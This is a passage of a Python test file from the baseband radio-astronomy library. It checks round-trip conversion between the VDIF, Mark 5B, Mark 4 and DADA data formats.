with vdif.open(fl, 'ws', sample_rate=1.28*u.MHz, **kwargs) as f1w:
h1w = f1w.header0
assert list(h1w.words[:4]) == list(h0.words[:4])
assert h1w.sample_rate == 1.28*u.MHz
f1w.write(d0)
with vdif.open(fl, 'rs') as f1r:
h1r = f1r.header0
d1r = f1r.read(1024)
assert h1r.words[:4] == h0.words[:4]
assert h1w.sample_rate == 1.28*u.MHz
assert np.all(d1r == d0)
class TestMark5BToVDIF3:
"""Real conversion: Mark5B to VDIF EDV 3, and back to Mark5B"""
def test_header(self):
with open(SAMPLE_M5B, 'rb') as fh:
m5h = mark5b.Mark5BHeader.fromfile(fh, kday=56000)
m5pl = mark5b.Mark5BPayload.fromfile(fh, sample_shape=(8,), bps=2)
# check that we have enough information to create VDIF EDV 3 header.
header = vdif.VDIFHeader.fromvalues(
edv=3, bps=m5pl.bps, sample_shape=(1,), station='WB',
time=m5h.time, sample_rate=32.*u.MHz, complex_data=False)
assert header.time == m5h.time
def test_stream(self, tmpdir):
"""Convert Mark 5B data stream to VDIF."""
# Here, we need to give how the data is encoded, since the data do not
# self-describe this. Furthermore, we need to pass in a rough time,
# and the rate at which samples were taken, so that absolute times can
# be calculated.
with mark5b.open(SAMPLE_M5B, 'rs', sample_rate=32.*u.MHz, kday=56000,
nchan=8, bps=2) as fr:
m5h = fr.header0
# create VDIF header from Mark 5B stream information.
header = vdif.VDIFHeader.fromvalues(
edv=3, bps=fr.bps, nchan=1, station='WB', time=m5h.time,
sample_rate=32.*u.MHz, complex_data=False)
data = fr.read(20000) # enough to fill one EDV3 frame.
time1 = fr.tell(unit='time')
# Get a file name in our temporary testing directory.
vdif_file = str(tmpdir.join('converted.vdif'))
# create and fill vdif file with converted data.
with vdif.open(vdif_file, 'ws', header0=header,
nthread=data.shape[1]) as fw:
assert (fw.tell(unit='time') - m5h.time) < 2. * u.ns
fw.write(data)
assert (fw.tell(unit='time') - time1) < 2. * u.ns
# Check two files contain same information.
with mark5b.open(SAMPLE_M5B, 'rs', sample_rate=32.*u.MHz, kday=56000,
nchan=8, bps=2) as fm, vdif.open(vdif_file,
'rs') as fv:
assert fm.header0.time == fv.header0.time
dm = fm.read(20000)
dv = fv.read(20000)
assert np.all(dm == dv)
assert fm.offset == fv.offset
assert fm.tell(unit='time') == fv.tell(unit='time')
# Convert VDIF file back to Mark 5B
mark5b_new_file = str(tmpdir.join('reconverted.mark5b'))
hv = fv.header0
hm = fm.header0
# Here, we fill some unimportant Mark 5B header information by
# hand, so we can compare byte-for-byte.
with mark5b.open(mark5b_new_file, 'ws', sample_rate=hv.sample_rate,
nchan=dv.shape[1], bps=hv.bps,
time=hv.time, user=hm['user'],
internal_tvg=hm['internal_tvg']) as fw:
fw.write(dv)
with open(SAMPLE_M5B, 'rb') as fh_orig, open(mark5b_new_file,
'rb') as fh_new:
assert fh_orig.read() == fh_new.read()
class TestVDIF3ToMark5B:
"""Real conversion: VDIF EDV 3 to Mark5B."""
def test_header(self):
with open(SAMPLE_VDIF, 'rb') as fh:
vh = vdif.VDIFHeader.fromfile(fh)
header = mark5b.Mark5BHeader.fromvalues(time=vh.time)
assert header.time == vh.time
def test_stream(self, tmpdir):
with vdif.open(SAMPLE_VDIF, 'rs') as fr:
vh = fr.header0
data = fr.read(20000) # enough to fill two Mark 5B frames.
fl = str(tmpdir.join('test.m5b'))
with mark5b.open(fl, 'ws', sample_rate=vh.sample_rate,
nchan=data.shape[1], bps=vh.bps, time=vh.time) as fw:
fw.write(data)
with vdif.open(SAMPLE_VDIF, 'rs') as fv, mark5b.open(
fl, 'rs', sample_rate=32.*u.MHz,
ref_time=Time(57000, format='mjd'), nchan=8, bps=2) as fm:
assert fv.header0.time == fm.header0.time
dv = fv.read(20000)
dm = fm.read(20000)
assert np.all(dm == dv)
assert fm.offset == fv.offset
assert fm.tell(unit='time') == fv.tell(unit='time')
class TestVDIF0BPS1ToMark5B:
"""Real conversion: VDIF EDV 3, BPS 1 to Mark 5B."""
def test_stream(self, tmpdir):
with vdif.open(SAMPLE_BPS1_VDIF, 'rs', sample_rate=8*u.MHz) as fr:
start_time = fr.start_time
data = fr.read(5000) # Just one Mark 5B frame.
fl = str(tmpdir.join('test.m5b'))
with mark5b.open(fl, 'ws', sample_rate=8.*u.MHz, nchan=data.shape[1],
bps=1, time=start_time) as fw:
fw.write(data)
fw.write(data)
with vdif.open(SAMPLE_BPS1_VDIF, 'rs',
sample_rate=8*u.MHz) as fv, mark5b.open(
fl, 'rs', sample_rate=8.*u.MHz, nchan=16, bps=1,
ref_time=Time('2018-09-01')) as fm:
assert fv.start_time == fm.start_time
dv = fv.read(5000)
dm = fm.read(5000)
assert np.all(dm == dv)
assert fm.offset == fv.offset
assert fm.tell(unit='time') == fv.tell(unit='time')
dm = fm.read(5000)
assert np.all(dm == dv)
class TestMark4ToVDIF1:
"""Real conversion: Mark 4 to VDIF EDV 1, and back to Mark 4.
Here, need to use a VDIF format with a flexible size, since we want
to create invalid frames corresponding to the pieces of data overwritten
by the Mark 4 header.
"""
def test_header(self):
with open(SAMPLE_M4, 'rb') as fh:
fh.seek(0xa88)
m4h = mark4.Mark4Header.fromfile(fh, ntrack=64, decade=2010)
# Check that we have enough information to create VDIF EDV 1 header.
header = vdif.VDIFHeader.fromvalues(
edv=1, bps=m4h.bps, nchan=1, station='Ar', time=m4h.time,
sample_rate=32.*u.MHz, payload_nbytes=640*2//8, complex_data=False)
assert abs(header.time - m4h.time) < 2. * u.ns
def test_stream(self, tmpdir):
with mark4.open(SAMPLE_M4, 'rs', sample_rate=32.*u.MHz,
ntrack=64, decade=2010) as fr:
m4header0 = fr.header0
start_time = fr.start_time
vheader0 = vdif.VDIFHeader.fromvalues(
edv=1, bps=m4header0.bps, nchan=1, station='Ar',
time=start_time, sample_rate=32.*u.MHz,
payload_nbytes=640*2//8, complex_data=False)
assert abs(vheader0.time - start_time) < 2. * u.ns
data = fr.read(80000) # full Mark 4 frame
offset1 = fr.tell()
time1 = fr.tell(unit='time')
number_of_bytes = fr.fh_raw.tell() - 0xa88
with open(SAMPLE_M4, 'rb') as fh:
fh.seek(0xa88)
orig_bytes = fh.read(number_of_bytes)
fl = str(tmpdir.join('test.vdif'))
with vdif.open(fl, 'ws', header0=vheader0,
nthread=data.shape[1]) as fw:
assert (fw.tell(unit='time') - start_time) < 2. * u.ns
# Write first VDIF frame, matching Mark 4 Header, hence invalid.
fw.write(data[:160], valid=False)
# Write remaining VDIF frames, with valid data.
fw.write(data[160:])
assert (fw.tell(unit='time') - time1) < 2. * u.ns
with vdif.open(fl, 'rs') as fv:
assert abs(fv.header0.time - start_time) < 2. * u.ns
expected = vheader0.copy()
expected['invalid_data'] = True
assert fv.header0 == expected
dv = fv.read(80000)
assert np.all(dv == data)
assert fv.offset == offset1
assert abs(fv.tell(unit='time') - time1) < 2.*u.ns
# Convert VDIF file back to Mark 4, and check byte-for-byte.
fl2 = str(tmpdir.join('test.m4'))
with mark4.open(fl2, 'ws', sample_rate=vheader0.sample_rate,
ntrack=64, bps=2, fanout=4, time=vheader0.time,
system_id=108) as fw:
fw.write(dv)
with open(fl2, 'rb') as fh:
conv_bytes = fh.read()
assert len(conv_bytes) == len(conv_bytes)
assert orig_bytes == conv_bytes
class TestDADAToVDIF1:
"""Real conversion: DADA to VDIF EDV 1, and back to DADA.
Here, we use a VDIF format with a flexible size so it is easier to fit
the dada file inside the VDIF one.
"""
def get_vdif_header(self, header):
return vdif.VDIFHeader.fromvalues(
edv=1, time=header.time, sample_rate=header.sample_rate,
bps=header.bps, nchan=header['NCHAN'],
complex_data=header.complex_data,
payload_nbytes=header.payload_nbytes // 2,
station=header['TELESCOPE'][:2])
def get_vdif_data(self, dada_data):
return (dada_data + 0.5 + 0.5j) / EIGHT_BIT_1_SIGMA
def get_dada_data(self, vdif_data):
return vdif_data * EIGHT_BIT_1_SIGMA - 0.5 - 0.5j
def test_header(self):
with open(SAMPLE_DADA, 'rb') as fh:
ddh = dada.DADAHeader.fromfile(fh)
# Check that we have enough information to create VDIF EDV 1 header.
header = self.get_vdif_header(ddh)
assert abs(header.time - ddh.time) < 2. * u.ns
assert header.payload_nbytes == ddh.payload_nbytes // 2
def test_payload(self):
with open(SAMPLE_DADA, 'rb') as fh:
fh.seek(4096)
ddp = dada.DADAPayload.fromfile(fh, payload_nbytes=64000,
sample_shape=(2, 1),
complex_data=True, bps=8)
dada_data = ddp.data
# Check that conversion between scalings works.
vdif_data = self.get_vdif_data(dada_data)
assert np.allclose(self.get_dada_data(vdif_data), dada_data)
# Check that we can create correct payloads.
vdif_payload0 = vdif.VDIFPayload.fromdata(vdif_data[:, 0, :], bps=8)
vdif_payload1 = vdif.VDIFPayload.fromdata(vdif_data[:, 1, :], bps=8)
vd0, vd1 = vdif_payload0.data, vdif_payload1.data
assert np.allclose(vd0, vdif_data[:, 0, :])
assert np.allclose(vd1, vdif_data[:, 1, :])
vd = np.zeros((vd0.shape[0], 2, vd0.shape[1]), vd0.dtype)
vd[:, 0] = vd0
vd[:, 1] = vd1
dd_new = self.get_dada_data(vd)
ddp2 = dada.DADAPayload.fromdata(dd_new, bps=8)
assert ddp2 == ddp
def test_stream(self, tmpdir):
with dada.open(SAMPLE_DADA, 'rs') as fr:
ddh = fr.header0
dada_data = fr.read()
offset1 = fr.tell()
stop_time = fr.tell(unit='time')
header = self.get_vdif_header(ddh)
data = self.get_vdif_data(dada_data)
assert abs(header.time - ddh.time) < 2. * u.ns
vdif_file = str(tmpdir.join('converted_dada.vdif'))
with vdif.open(vdif_file, 'ws', header0=header,
nthread=data.shape[1]) as fw:
assert (fw.tell(unit='time') - header.time) < 2. * u.ns
# Write all data in since frameset, made of two frames.
fw.write(data)
assert (fw.tell(unit='time') - stop_time) < 2. * u.ns
assert fw.offset == offset1
with vdif.open(vdif_file, 'rs') as fv:
assert abs(fv.header0.time - ddh.time) < 2. * u.ns
dv = fv.read()
assert fv.offset == offset1
assert np.abs(fv.tell(unit='time') - stop_time) < 2.*u.ns
vh = fv.header0
vnthread = fv.sample_shape.nthread
assert np.allclose(dv, data)
# Convert VDIF file back to DADA.
dada_file = str(tmpdir.join('reconverted.dada'))
dv_data = self.get_dada_data(dv)
assert np.allclose(dv_data, dada_data)
with dada.open(dada_file, 'ws', sample_rate=vh.sample_rate,
time=vh.time, npol=vnthread, bps=vh.bps,
payload_nbytes=vh.payload_nbytes*2, nchan=vh.nchan,
telescope=vh.station,
complex_data=vh['complex_data']) as fw:
new_header = fw.header0
fw.write(dv_data)
assert self.get_vdif_header(new_header) == vh
with dada.open(dada_file, 'rs') as fh:
header = fh.header0
new_dada_data = fh.read()
assert header == new_header
assert self.get_vdif_header(header) == vh
assert np.allclose(new_dada_data, dada_data)
|
mhvk/baseband
|
baseband/tests/test_conversion.py
|
Python
|
gpl-3.0
| 19,399
|